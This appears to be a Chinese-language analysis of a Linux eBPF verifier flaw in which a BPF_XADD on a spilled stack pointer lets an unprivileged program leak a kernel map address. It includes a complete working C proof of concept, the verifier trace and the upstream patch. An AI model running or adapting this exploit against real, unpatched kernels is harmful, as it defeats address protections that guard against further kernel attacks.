前言

enum bpf_reg_type {
	NOT_INIT = 0,		 /* nothing was written into register */
	SCALAR_VALUE,		 /* reg doesn't contain a valid pointer */
	PTR_TO_CTX,		 /* reg points to bpf_context */
	CONST_PTR_TO_MAP,	 /* reg points to struct bpf_map */
	PTR_TO_MAP_VALUE,	 /* reg points to map element value */
	PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
	PTR_TO_STACK,		 /* reg == frame_pointer + offset */
	PTR_TO_PACKET_META,	 /* skb->data - meta_len */
	PTR_TO_PACKET,		 /* reg points to skb->data */
	PTR_TO_PACKET_END,	 /* skb->data + headlen */
	PTR_TO_FLOW_KEYS,	 /* reg points to bpf_flow_keys */
	PTR_TO_SOCKET,		 /* reg points to struct bpf_sock */
	PTR_TO_SOCKET_OR_NULL,	 /* reg points to struct bpf_sock or NULL */
	PTR_TO_SOCK_COMMON,	 /* reg points to sock_common */
	PTR_TO_SOCK_COMMON_OR_NULL, /* reg points to sock_common or NULL */
	PTR_TO_TCP_SOCK,	 /* reg points to struct tcp_sock */
	PTR_TO_TCP_SOCK_OR_NULL, /* reg points to struct tcp_sock or NULL */
	PTR_TO_TP_BUFFER,	 /* reg points to a writable raw tp's buffer */
	PTR_TO_XDP_SOCK,	 /* reg points to struct xdp_sock */
	PTR_TO_BTF_ID,		 /* reg points to kernel struct */
	PTR_TO_BTF_ID_OR_NULL,	 /* reg points to kernel struct or NULL */
	PTR_TO_MEM,		 /* reg points to valid memory region */
	PTR_TO_MEM_OR_NULL,	 /* reg points to valid memory region or NULL */
};

bpf模块中,在通过check_mem_access检查后,check_xadd()函数(自加操作)设置了一个黑名单,目前只允许四种指针类型使用XADD指令:

if (is_ctx_reg(env, insn->dst_reg) ||
	    is_pkt_reg(env, insn->dst_reg) ||
	    is_flow_key_reg(env, insn->dst_reg) ||
	    is_sk_reg(env, insn->dst_reg)) {
		verbose(env, "BPF_XADD stores into R%d %s is not allowed\n",
			insn->dst_reg,
			reg_type_str[reg_state(env, insn->dst_reg)->type]);
		return -EACCES;
	}
PTR_TO_MAP_VALUE
PTR_TO_CTX           rejected
PTR_TO_STACK
PTR_TO_PACKET        rejected
PTR_TO_PACKET_META   rejected
PTR_TO_FLOW_KEYS     rejected
PTR_TO_SOCKET        rejected
PTR_TO_SOCK_COMMON   rejected
PTR_TO_TCP_SOCK      rejected
PTR_TO_XDP_SOCK      rejected
PTR_TO_TP_BUFFER
PTR_TO_BTF_ID

分别为:

  • PTR_TO_MAP_VALUE
  • PTR_TO_STACK
  • PTR_TO_TP_BUFFER
  • PTR_TO_BTF_ID

漏洞分析

do_check->check_xadd
	->check_mem_access  BPF_READ
    	->check_stack_read
    		->mark_reg_read
	->check_mem_access  BPF_WRITE
    	->check_stack_write
	
	/* check whether atomic_add can read the memory */
	err = check_mem_access(env, insn_idx, insn->dst_reg, insn->off,
			       BPF_SIZE(insn->code), BPF_READ, -1, true);
	if (err)
		return err;

	/* check whether atomic_add can write into the same memory */
	return check_mem_access(env, insn_idx, insn->dst_reg, insn->off,
				BPF_SIZE(insn->code), BPF_WRITE, -1, true);

第一个check_mem_access检查了xadd操作是否可以读取内存,针对栈指针的操作,就是验证是否可以读取栈的内容。

lock *(u64 *)(r10 -8) += r1 ,这条指令对栈有读写操作,在读检测时,从栈中读出是指针类型也可检验通过。

这个漏洞关键点在于通过

lock *(u64 *)(r10 -8) += r1
r8 = *(u64 *)(r10 -8)

使得到的r8不是指针类型,而是SCALAR_VALUE,才能绕过map对写入数据是否为指针的检测,从而泄露地址。

将指针写入栈中,或读取栈中的指针都没有限制,主要是如何让r8变成SCALAR_VALUE,明天看

这里修改了reg的类型,变成NOT_INIT

/* regular write of data into stack destroys any spilled ptr */
		state->stack[spi].spilled_ptr.type = NOT_INIT;
		/* Mark slots as STACK_MISC if they belonged to spilled ptr. */
		if (state->stack[spi].slot_type[0] == STACK_SPILL)
			for (i = 0; i < BPF_REG_SIZE; i++)
				state->stack[spi].slot_type[i] = STACK_MISC;

主要是通过xadd 操作,使得state->stack[spi].slot_type[0] 不等于 STACK_SPILL ,绕过了check_stack_write这个限制:

if (!env->allow_ptr_leaks &&                          
     state->stack[spi].slot_type[0] == STACK_SPILL && size != BPF_REG_SIZE) {         			verbose(env, "attempt to corrupt spilled pointer on stack\n");              
     return -EACCES;  
 }  

PoC代码

#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/prctl.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/socket.h>
#include <string.h>
#include <poll.h>
#include <sys/uio.h>
#include <fcntl.h>

#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))


/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1    BPF_REG_1
#define BPF_REG_ARG2    BPF_REG_2
#define BPF_REG_ARG3    BPF_REG_3
#define BPF_REG_ARG4    BPF_REG_4
#define BPF_REG_ARG5    BPF_REG_5
#define BPF_REG_CTX     BPF_REG_6
#define BPF_REG_FP      BPF_REG_10

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)         \
  ((struct bpf_insn) {                          \
    .code  = BPF_LD | BPF_DW | BPF_IMM,         \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = (__u32) (IMM) }),                  \
  ((struct bpf_insn) {                          \
    .code  = 0, /* zero is reserved opcode */   \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD)              \
  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)        \
  ((struct bpf_insn) {                          \
    .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = OFF,                               \
    .imm   = 0 })
#define BPF_MOV64_REG(DST, SRC)                 \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_MOV | BPF_X,       \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_ALU32_IMM(OP, DST, IMM)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU | BPF_OP(OP) | BPF_K,      \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)        \
  ((struct bpf_insn) {                          \
    .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = OFF,                               \
    .imm   = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM)         \
  ((struct bpf_insn) {                          \
    .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = OFF,                               \
    .imm   = IMM })
#define BPF_EMIT_CALL(FUNC)                     \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_CALL,                \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF)          \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_OP(OP) | BPF_K,      \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = OFF,                               \
    .imm   = IMM })
#define BPF_EXIT_INSN()                         \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_EXIT,                \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_LD_ABS(SIZE, IMM)                   \
  ((struct bpf_insn) {                          \
    .code  = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_ALU64_REG(OP, DST, SRC)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,    \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_MOV64_IMM(DST, IMM)                 \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_MOV | BPF_K,       \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })

int bpf_(int cmd, union bpf_attr *attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int array_create(int value_size, int num_entries) {
  union bpf_attr create_map_attrs = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = 4,
      .value_size = value_size,
      .max_entries = num_entries
  };
  int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
  if (mapfd == -1)
    err(1, "map create");
  return mapfd;
}

unsigned long get_ulong(int map_fd, uint64_t idx) {
  uint64_t value;
  union bpf_attr lookup_map_attrs = {
    .map_fd = map_fd,
    .key = (uint64_t)&idx,
    .value = (uint64_t)&value
  };
  if (bpf_(BPF_MAP_LOOKUP_ELEM, &lookup_map_attrs))
    err(1, "MAP_LOOKUP_ELEM");
  return value;
}

int prog_load(struct bpf_insn *insns, size_t insns_count) {
  char verifier_log[100000];
  union bpf_attr create_prog_attrs = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = insns_count,
    .insns = (uint64_t)insns,
    .license = (uint64_t)GPLv2,
    .log_level = 2,
    .log_size = sizeof(verifier_log),
    .log_buf = (uint64_t)verifier_log
  };
  int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
  int errno_ = errno;
  printf("==========================\n%s==========================\n",
verifier_log);
  errno = errno_;
  if (progfd == -1)
    err(1, "prog load");
  return progfd;
}

int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
  int progfd = prog_load(insns, insns_count);

  // hook eBPF program up to a socket
  // sendmsg() to the socket will trigger the filter
  // returning 0 in the filter should toss the packet
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
    err(1, "socketpair");
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    err(1, "setsockopt");
  return socks[1];
}

void trigger_proc(int sockfd) {
  if (write(sockfd, "X", 1) != 1)
    err(1, "write to proc socket failed");
}

int main(void) {
  int small_map = array_create(8, 1);
  struct bpf_insn insns[] = {
    // r7 = map_pointer
    BPF_LD_MAP_FD(BPF_REG_7, small_map),
    // r8 = launder(map_pointer)
    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_7, -8),
    BPF_MOV64_IMM(BPF_REG_1, 0),
    ((struct bpf_insn) {
      .code  = BPF_STX | BPF_DW | BPF_XADD,
      .dst_reg = BPF_REG_FP,
      .src_reg = BPF_REG_1,
      .off = -8
    }),
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_FP, -8),

    // store r8 into map
    BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_7),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
  trigger_proc(sock_fd);
  printf("map[0] = 0x%lx\n", get_ulong(small_map, 0));
}

执行的指令为:

0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r7 = 0x0
2: (7b) *(u64 *)(r10 -8) = r7
3: (b7) r1 = 0
4: (db) lock *(u64 *)(r10 -8) += r1
5: (79) r8 = *(u64 *)(r10 -8)
6: (bf) r1 = r7
7: (bf) r2 = r10
8: (07) r2 += -4
9: (62) *(u32 *)(r2 +0) = 0
10: (85) call bpf_map_lookup_elem#1
11: (55) if r0 != 0x0 goto pc+1
12: (95) exit
13: (7b) *(u64 *)(r0 +0) = r8
14: (b7) r0 = 0
15: (95) exit

扩展思路:

(1)栈的写检查是否有问题

(2)其他指令

(3)其他类型的指针,比如map指针

./verifier.c:2169:	if (value_regno >= 0)
./verifier.c:2298:			if (value_regno >= 0) {
./verifier.c:2312:		if (value_regno >= 0) {
./verifier.c:2347:		if (value_regno >= 0) {
./verifier.c:3102:	if (atype == BPF_READ && value_regno >= 0) {
./verifier.c:3143:		if (t == BPF_WRITE && value_regno >= 0 &&
./verifier.c:3152:		if (!err && t == BPF_READ && value_regno >= 0) {
./verifier.c:3177:		if (t == BPF_WRITE && value_regno >= 0 &&
./verifier.c:3190:		if (!err && t == BPF_READ && value_regno >= 0) {
./verifier.c:3236:		if (t == BPF_WRITE && value_regno >= 0 &&
./verifier.c:3243:		if (!err && t == BPF_READ && value_regno >= 0)
./verifier.c:3246:		if (t == BPF_WRITE && value_regno >= 0 &&
./verifier.c:3254:		if (!err && t == BPF_READ && value_regno >= 0)
./verifier.c:3263:		if (!err && value_regno >= 0)
./verifier.c:3267:		if (!err && t == BPF_READ && value_regno >= 0)
./verifier.c:3278:	if (!err && size < BPF_REG_SIZE && value_regno >= 0 && t == BPF_READ &&

补丁

@@ -2308,6 +2317,16 @@ static int check_stack_read(struct bpf_verifier_env *env,
                         * which resets stack/reg liveness for state transitions
                         */
                        state->regs[value_regno].live |= REG_LIVE_WRITTEN;
+               } else if (__is_pointer_value(env->allow_ptr_leaks, reg)) {
+                       /* If value_regno==-1, the caller is asking us whether
+                        * it is acceptable to use this value as a SCALAR_VALUE
+                        * (e.g. for XADD).
+                        * We must not allow unprivileged callers to do that
+                        * with spilled pointers.
+                        */
+                       verbose(env, "leaking pointer from stack off %d\n",
+                               off);
+                       return -EACCES;
                }
                mark_reg_read(env, reg, reg->parent, REG_LIVE_READ64);
        } else {

lock *(u64 *)(r10 -8) += r1 这条指令对栈有读写操作,在读检测时,补丁的做法是如果从栈中读出的不是SCALAR_VALUE类型,而是指针类型,就不让读了,报错退出。

在value_regno =-1的情况下,如果reg是指针类型就报错

参考链接

https://lore.kernel.org/bpf/CAG48ez0ZaSo-fC0bXnYChAmEZvv_0sGsxUG5HdFn6YJdOf1=Mg@mail.gmail.com/